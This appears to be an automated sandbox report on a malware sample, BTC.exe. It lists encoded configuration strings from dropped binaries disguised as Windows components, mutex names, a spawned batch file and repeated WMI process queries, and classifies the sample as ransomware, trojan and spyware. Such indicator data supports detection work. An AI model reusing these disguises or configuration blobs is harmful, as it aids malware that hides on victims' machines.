                            Source: svchost.exe.0.dr, Settings.csBase64 encoded string: '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'
                            Source: update.exe.0.dr, .csBase64 encoded string: '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', 'HZ8cUSwMOJ6qgU9qML8pT52ujZ1nO8sF7yY
                            Source: Windows Defender Service Host.exe.0.dr, Settings.csBase64 encoded string: '/u4ef6e+nS3A9mY7wLdkKdx/z2PWLlxGPGu8l+4KvRW5CU0SmqA+xeI+TI0PfSJS', '+B1RkBjlG/ongUjWjfeMac6GZMTnlcpzZSkEXBjY9Q05LLqNl8D36JB4MFovFitU', 'MJxqtbdTMHxK1dHuWOFYXzzMQpufnEb5J/P6MBeIFsyMuryzLLG869pCiUQtO+2L', 'rG2Gd+ezCKZI9+LFMrsOdU7/pdqCc6qwQw4ih5AnBkAZAgzjJWh+1iL6AMrluxMB', 'xZGSufyPtUb0tRhWBSvMzlk7HG2FcH+aICaXo02j7JblesXwNxLObDAZU1+xdBu/'
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Settings.csBase64 encoded string: '/u4ef6e+nS3A9mY7wLdkKdx/z2PWLlxGPGu8l+4KvRW5CU0SmqA+xeI+TI0PfSJS', '+B1RkBjlG/ongUjWjfeMac6GZMTnlcpzZSkEXBjY9Q05LLqNl8D36JB4MFovFitU', 'MJxqtbdTMHxK1dHuWOFYXzzMQpufnEb5J/P6MBeIFsyMuryzLLG869pCiUQtO+2L', 'rG2Gd+ezCKZI9+LFMrsOdU7/pdqCc6qwQw4ih5AnBkAZAgzjJWh+1iL6AMrluxMB', 'xZGSufyPtUb0tRhWBSvMzlk7HG2FcH+aICaXo02j7JblesXwNxLObDAZU1+xdBu/'
                            Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, Settings.csBase64 encoded string: 'Qn8SqsI3jUQBAUjqjalm3oJMLd/PbscIFd6rNbQ5sRZNn4xQ1j9+smFfWlHEI1gikBTJ0XwXBbd7vrP4j7UNlA==', 'WwGUu43hHVOQw4bhNIONAbpY8cH0OewHJ6IJs1kKJ+cu/7wi9YsKufGrVcAtJreaghEgt3mKwnnP4jUNLVCerlv/S0eftqeHDCa8kAVIzT4=', 'wxTsCpYNu1AiEBtW0/wF2Xsle2ZY6OiGu6IE3jMxekVMgibQsLE47ouxwB/hD5QIHh1HjkaDjgCTz5TgDgJNhfsNtnq3Hb5jHb1NqETf8pbbLS5GP3lA9At6RUJ33ZCh', 'ywn+OxV3qgXWKyUE+iTmL0mFT3aNwmXqH/A241apHqZR5xfPAY4d1oDzbkJMbCrW0mumEKlXNebqerwRdgmFPQ==', 'gqkeIT57xRAiTK0cwZ6vsPBVrF0/NDUstza9ynwGWtvf8Ikec+nCNSi1LMiuTooq/10AN/TPgcmVUIqCUEdSC+N3b3XTX/vyxzaoictl2YTNTKnr2Wd0CTayJNMJJO2HnwzX/IcrtvB2OEom1X7k89XKpqtumdHAbhG5k5Pq+iJJMnEILpumZQPlFyx0gLmYeoB6RStu4pjFHTRwRLjeGFyya8H5z/JC57mRUfBEldhE1ixIz594/p7YKZO7vFAwOcX5DOjdIwfkQgr4Pm0cYGAulm7CltV5JIpNvZFUSdPuSgg4DbHA/9otLbVYpvJVbeQYyKYXPYHDWcZdfOIXeIHD3vHTmyratXNG79vHJKw09fi94gorFFsXvK507/lb9VMt0ZaMOklRzlEANuezAw6dgaAuo70n07xZAm122efC53PMp3JBRwWMdQJYV0lt7wOS6WFsAnTkq5g8w7k9rq9m6IsC+3xK56aCEOg1KAskBhtSRxGesNc2R2caPu2ST8jMaEFbzpm9hkSiE04B5lK2z0aamcTFnVTr3VNjgEYQlYIEH3lA0W0i6h7IXb6egtq6xFXa+LRts6CuatPS/hBpBEZsx6jr9cd5KLbQE7aFo7V+SltqBkxzUDlJty7VFLQyueR9/wMNL8OpmuZB6LEjm5p/dOFq0vXxu2BPfB/rIIeYUO6LYjPOPnRGM5q8AljGk4DuN8EcGDBPyi7MNI7LK6nCKbeHYcWkgJ8bYBWSYY9QQyDfHgEARc0boHkf5Fyt9HqxkoNRqmZtpEFDIkGBNbjFjcFZ7D6kj6zg27/qRT+gAKGPURs4CpYTp6Uds5AnnAYUfb72mlesTlGaLk+nCHKfcclYpFgWL+01zq/jDQyR9nqBQe4F5ik+Hp6B4zLWK+blzxbwYBFyw4VkokxHzk0biXCYez/dQI742PTZZAO/olRR4jnSClF8t3MRRw6AjUTN9wwtDR7+M00ii/bsoBwgu6PCOgeXKM039XR5LJ1R6Au3nwJKEhbc1xfuO37uBzeAa6HCGc2Cx28JTwqHoz3BMBzvBWb59jvsNEUeBB6ON1pakDvMopL1ccCe', 'Q/UCu6O47CHFGS6KCBvM4o1+Usq+s6Ccg2UKnm/GJqCVWrBQ3L9hKjojrlgaefg1NwBAJ8ORnVT5JMNcdmWzFw==', 'j/7gTotOxXp2+vfq93u+6A2lmLCVvVGgv+oHm8X+q2MPS5v1jKAaieoUVjlLC4fPtYq6cVnDufXuNZZwXbzmLg==', '/h1sm9P1a0vsAHGS8FWEGBd85oCTGrU9bR3qkhrL/yHSsHXp+/O5kqUUccsMCZ4KW+AmDJ3iXa56+31XiEJM+Q=='
                            Source: svchost.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: svchost.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: Cracked.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: Cracked.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: Windows Defender Service Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: Windows Defender Service Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: update.exe.0.dr, .csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: update.exe.0.dr, .csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@160/314@6/12
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeCode function: 3_2_00007FF848F028CD CreateToolhelp32Snapshot,3_2_00007FF848F028CD
                            Source: C:\Users\user\Desktop\BTC.exeFile created: C:\Users\user\AppData\Roaming\crack.exeJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9000:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeMutant created: \Sessions\1\BaseNamedObjects\vsvf
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8196:120:WilError_03
                            Source: C:\Users\user\Desktop\BTC.exeMutant created: \Sessions\1\BaseNamedObjects\ByAnl9OXWt9lDZxwI
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8972:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:748:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5344:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeMutant created: \Sessions\1\BaseNamedObjects\VNM_MUTEX_h1gQxrpyccCFZq7JPS
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeMutant created: \Sessions\1\BaseNamedObjects\4chIqEbR5Rq6U6EI
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2284:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\crack.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE49C.tmpJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat""
                            Source: BTC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: BTC.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
